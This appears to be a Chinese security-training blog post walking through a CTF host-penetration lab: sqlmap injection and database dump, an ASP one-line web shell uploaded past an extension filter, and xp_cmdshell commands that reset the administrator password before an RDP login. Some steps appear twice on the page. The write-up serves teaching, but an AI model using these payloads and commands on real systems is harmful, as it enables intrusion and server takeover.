热门课程

免费试听

上课方式

开班时间

当前位置: 首页 -   文章 -   新闻动态 -   正文

CTF之主机渗透系列三

知了堂姐
2024-07-08 17:22:16
0

知了堂禁卫安全实验室(冯万忠.GoDun.F-原创)

0x00 介绍

接着上一篇,咱们继续。还是那句话,任何工具使用均来自互联网,涉及到的技术仅用于教学,不得用于非法用途,请遵守国家安全法律法规,做一个正能量的安全人员。

试题如下:


 


第一步:我们访问链接:http://202.0.0.23/


 


进入网页首页,通过浏览观察,找到http://202.0.0.23/NewsList.asp?SortID=17 新闻资讯页面,通过get方法提交的参数名为SortID,值为1,我们尝试一下是否存在sql注入,通过sqlmap去跑一下


 

 


发现存在sql注入漏洞

sqlmap.py -u http://202.0.0.23/Notice.asp?ItemID=17 –dbs


 


sqlmap.py -u http://202.0.0.23/Notice.asp?ItemID=17 -D Test_EIMS –tables


 


sqlmap.py -u http://202.0.0.23/Notice.asp?ItemID=17 -D Test_EIMS -T eims_flag –dump


 


查看账号密码的数据库表


 


对b2076528346216b3进行md5解密,解密得密码为admin1234账号为root

第二步:接下来使用御剑后台扫描,找到后台登录页面

 

 

 


右键此页面查看源码,找到一个flag:


 


第三步:使用账户root密码admin1234登录后台,在后台系统信息-文件上传处上传后缀为.asp的asp一句话木马,一句话木马内容:<%eval request("caidao")%> (按照asp一句话木马格式)


 


结果提示上传文件格式不对,想下绕过办法 



这里我们将一句话木马文件改一个可执行的后缀.cer


 


则上传成功

第四步:下面我们直接上菜刀工具了


 


在网站根目录发现flag文件flag3{23c5b149510105853f5e7ef9a6f06627}


 


在数据库配置文件中找到数据库的账号密码


 


使用一句话木马连接mssql数据库


 


利用mssql数据库的xpcmdshell组件执行系统命令 EXEC master..xp_cmdshell 'whoami'


 


当前cmdshell的权限是system权限,所以直接修改administrator的密码为hacker:EXEC master..xp_cmdshell 'net user administrator 123456'


 


第五步:直接远程桌面连接服务器administrator/123456,在桌面发现flag文件,flag5{47baf6d9d60f40c8b1dafa56c62fcd06}


 

 


在c盘发现另外一个flag文件 flag4{e35a01e91e1833d266f95881ae83b4ca}


 


至此,5个flag就找出来了,未完待续!!!

大家都在看

成都it培训机构哪个好?IT培训机构靠谱吗

2024-07-08 浏览次数:0

信安干货│ARP欺骗攻击及防御

2024-07-08 浏览次数:0

成都网络安全培训机构哪家好

2024-07-08 浏览次数:0

学ui设计需要画画基础吗?UI设计好学吗

2024-07-08 浏览次数:0

网络安全能找什么工作岗位?网络安全行业高新岗位总...

2024-07-08 浏览次数:0

入职极米科技,我酸了!

2024-07-08 浏览次数:0
最新资讯


 


第三步:使用账户root密码admin1234登录后台,在后台系统信息-文件上传处上传后缀为.asp的asp一句话木马,一句话木马内容:<%eval request("caidao")%> (按照asp一句话木马格式)


 


结果提示上传文件格式不对,想下绕过办法 



这里我们将一句话木马文件改一个可执行的后缀.cer


 


则上传成功

第四步:下面我们直接上菜刀工具了


 


在网站根目录发现flag文件flag3{23c5b149510105853f5e7ef9a6f06627}


 


在数据库配置文件中找到数据库的账号密码


 


使用一句话木马连接mssql数据库


 


利用mssql数据库的xpcmdshell组件执行系统命令 EXEC master..xp_cmdshell 'whoami'


 


当前cmdshell的权限是system权限,所以直接修改administrator的密码为hacker:EXEC master..xp_cmdshell 'net user administrator 123456'


 


第五步:直接远程桌面连接服务器administrator/123456,在桌面发现flag文件,flag5{47baf6d9d60f40c8b1dafa56c62fcd06}


 

 


在c盘发现另外一个flag文件 flag4{e35a01e91e1833d266f95881ae83b4ca}


 


至此,5个flag就找出来了,未完待续!!!

上一篇:CTF之主机渗透系列一

下一篇:是谁?拿到了滴滴、同程艺龙offer

相关内容

热门资讯

就业课程介绍(Java+前端+... Java+大数据,前端全栈,信息安全
关于我们 请输入文章描述
0基础转行信安,他如何做到月薪... 转行并非简单的换份工作,而是我们在职场进行自我认同、重塑身份的一个过程。今天知了小姐姐为大家介绍一位...
【前端每日一题】什么是BFC?... 秋招马上就要开始了,小伙伴们最近在准备面试的东西没呢,知了姐今天将蛋糕哥整理的前端面试题共享出来,同...
cisp考试费用多少?cisp... 随着网络技术的快速发展,网络安全问题变得越来越重要。那么,CISP考试费用多少?CISP报名条件是什...
pythone 文件和数据格式... 关于 Python 对文件的处理,以下选项中描述错误的是
img标签的onerror事件... 1.img 标签除了 onerror 属性外,还有其他获取管理员路径的办法吗? src 指定一个远程...
知了堂官网V3第一版内测邀请 经过几个月的加班加点,我们终于迎来了知了堂官网3.1.0版本 现正招募内测中
网络安全运维岗面试题及答案详解... 在当今数字化时代,网络安全运维工程师的角色变得愈发重要。为了保障网络安全,各个企业都需要拥有一支经验...
川农第一次线下拓展精彩瞬间 5月15日,知了堂的哥哥姐姐们携手企业拓展教练浩浩荡荡奔赴川农。
-->